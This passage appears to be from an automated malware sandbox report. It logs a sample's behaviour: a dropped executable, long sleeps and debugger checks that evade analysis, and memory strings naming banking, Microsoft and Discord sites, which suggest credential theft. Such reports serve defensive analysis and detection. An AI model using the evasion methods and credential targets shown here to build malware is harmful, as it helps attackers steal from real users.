Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A096E rdtsc 8_2_204A096E
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6680 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3072 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe API coverage: 0.3 %
Source: C:\Windows\SysWOW64\cmd.exe API coverage: 2.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405A19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004065CE FindFirstFileA,FindClose, 0_2_004065CE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004027AA FindFirstFileA, 0_2_004027AA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003DB880 FindFirstFileW,FindNextFileW,FindClose, 14_2_003DB880
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Moviedom230\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: 545Ni1I.14.dr Binary or memory string: tasks.office.comVMware20,11696501413o
Source: 545Ni1I.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: 545Ni1I.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: 545Ni1I.14.dr Binary or memory string: dev.azure.comVMware20,11696501413j
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: cmd.exe, 0000000E.00000002.2614682827.00000000008E2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: Overfondle.exe, 00000008.00000002.2170573580.000000000446E000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065800892.000000000446E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 545Ni1I.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: 545Ni1I.14.dr Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: 545Ni1I.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2615832475.00000000013DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: 545Ni1I.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: firefox.exe, 00000011.00000002.2458322940.0000016A1F53C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: 545Ni1I.14.dr Binary or memory string: outlook.office.comVMware20,11696501413s
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: 545Ni1I.14.dr Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: 545Ni1I.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: 545Ni1I.14.dr Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 545Ni1I.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: 545Ni1I.14.dr Binary or memory string: global block list test formVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: 545Ni1I.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: 545Ni1I.14.dr Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: 545Ni1I.14.dr Binary or memory string: discord.comVMware20,11696501413f
Source: 545Ni1I.14.dr Binary or memory string: AMC password management pageVMware20,11696501413
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\cmd.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A096E rdtsc 8_2_204A096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0333D7B8 LdrInitializeThunk, 2_2_0333D7B8
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20462050 mov eax, dword ptr fs:[00000030h] 8_2_20462050
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E6050 mov eax, dword ptr fs:[00000030h] 8_2_204E6050
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2048C073 mov eax, dword ptr fs:[00000030h] 8_2_2048C073
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20502000 mov eax, dword ptr fs:[00000030h] 8_2_20502000
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h] 8_2_2047E016
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h] 8_2_2047E016
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h] 8_2_2047E016
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h] 8_2_2047E016
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A020 mov eax, dword ptr fs:[00000030h] 8_2_2045A020
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C020 mov eax, dword ptr fs:[00000030h] 8_2_2045C020
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F6030 mov eax, dword ptr fs:[00000030h] 8_2_204F6030
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E20DE mov eax, dword ptr fs:[00000030h] 8_2_204E20DE
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A0E3 mov ecx, dword ptr fs:[00000030h] 8_2_2045A0E3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E60E0 mov eax, dword ptr fs:[00000030h] 8_2_204E60E0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204680E9 mov eax, dword ptr fs:[00000030h] 8_2_204680E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C0F0 mov eax, dword ptr fs:[00000030h] 8_2_2045C0F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A20F0 mov ecx, dword ptr fs:[00000030h] 8_2_204A20F0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046208A mov eax, dword ptr fs:[00000030h] 8_2_2046208A
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204580A0 mov eax, dword ptr fs:[00000030h] 8_2_204580A0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F80A8 mov eax, dword ptr fs:[00000030h] 8_2_204F80A8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205260B8 mov eax, dword ptr fs:[00000030h] 8_2_205260B8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205260B8 mov ecx, dword ptr fs:[00000030h] 8_2_205260B8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h] 8_2_204F4144
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h] 8_2_204F4144
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F4144 mov ecx, dword ptr fs:[00000030h] 8_2_204F4144
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h] 8_2_204F4144
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F4144 mov eax, dword ptr fs:[00000030h] 8_2_204F4144
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466154 mov eax, dword ptr fs:[00000030h] 8_2_20466154
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466154 mov eax, dword ptr fs:[00000030h] 8_2_20466154
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045C156 mov eax, dword ptr fs:[00000030h] 8_2_2045C156
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204F8158 mov eax, dword ptr fs:[00000030h] 8_2_204F8158
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534164 mov eax, dword ptr fs:[00000030h] 8_2_20534164
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20534164 mov eax, dword ptr fs:[00000030h] 8_2_20534164
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20520115 mov eax, dword ptr fs:[00000030h] 8_2_20520115
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050A118 mov ecx, dword ptr fs:[00000030h] 8_2_2050A118
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050A118 mov eax, dword ptr fs:[00000030h] 8_2_2050A118
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050A118 mov eax, dword ptr fs:[00000030h] 8_2_2050A118
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050A118 mov eax, dword ptr fs:[00000030h] 8_2_2050A118
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov eax, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2050E10E mov ecx, dword ptr fs:[00000030h] 8_2_2050E10E
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20490124 mov eax, dword ptr fs:[00000030h] 8_2_20490124
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205261C3 mov eax, dword ptr fs:[00000030h] 8_2_205261C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205261C3 mov eax, dword ptr fs:[00000030h] 8_2_205261C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h] 8_2_204DE1D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h] 8_2_204DE1D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE1D0 mov ecx, dword ptr fs:[00000030h] 8_2_204DE1D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h] 8_2_204DE1D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204DE1D0 mov eax, dword ptr fs:[00000030h] 8_2_204DE1D0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204901F8 mov eax, dword ptr fs:[00000030h] 8_2_204901F8
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205361E5 mov eax, dword ptr fs:[00000030h] 8_2_205361E5
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A0185 mov eax, dword ptr fs:[00000030h] 8_2_204A0185
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20504180 mov eax, dword ptr fs:[00000030h] 8_2_20504180
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20504180 mov eax, dword ptr fs:[00000030h] 8_2_20504180
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E019F mov eax, dword ptr fs:[00000030h] 8_2_204E019F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E019F mov eax, dword ptr fs:[00000030h] 8_2_204E019F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E019F mov eax, dword ptr fs:[00000030h] 8_2_204E019F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E019F mov eax, dword ptr fs:[00000030h] 8_2_204E019F
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A197 mov eax, dword ptr fs:[00000030h] 8_2_2045A197
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A197 mov eax, dword ptr fs:[00000030h] 8_2_2045A197
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A197 mov eax, dword ptr fs:[00000030h] 8_2_2045A197
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051C188 mov eax, dword ptr fs:[00000030h] 8_2_2051C188
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051C188 mov eax, dword ptr fs:[00000030h] 8_2_2051C188
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051A250 mov eax, dword ptr fs:[00000030h] 8_2_2051A250
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051A250 mov eax, dword ptr fs:[00000030h] 8_2_2051A250
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E8243 mov eax, dword ptr fs:[00000030h] 8_2_204E8243
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204E8243 mov ecx, dword ptr fs:[00000030h] 8_2_204E8243
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2053625D mov eax, dword ptr fs:[00000030h] 8_2_2053625D
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045A250 mov eax, dword ptr fs:[00000030h] 8_2_2045A250
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20466259 mov eax, dword ptr fs:[00000030h] 8_2_20466259
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20510274 mov eax, dword ptr fs:[00000030h] 8_2_20510274
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464260 mov eax, dword ptr fs:[00000030h] 8_2_20464260
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464260 mov eax, dword ptr fs:[00000030h] 8_2_20464260
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_20464260 mov eax, dword ptr fs:[00000030h] 8_2_20464260
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045826B mov eax, dword ptr fs:[00000030h] 8_2_2045826B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045823B mov eax, dword ptr fs:[00000030h] 8_2_2045823B
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2046A2C3 mov eax, dword ptr fs:[00000030h] 8_2_2046A2C3
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205362D6 mov eax, dword ptr fs:[00000030h] 8_2_205362D6
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204702E1 mov eax, dword ptr fs:[00000030h] 8_2_204702E1
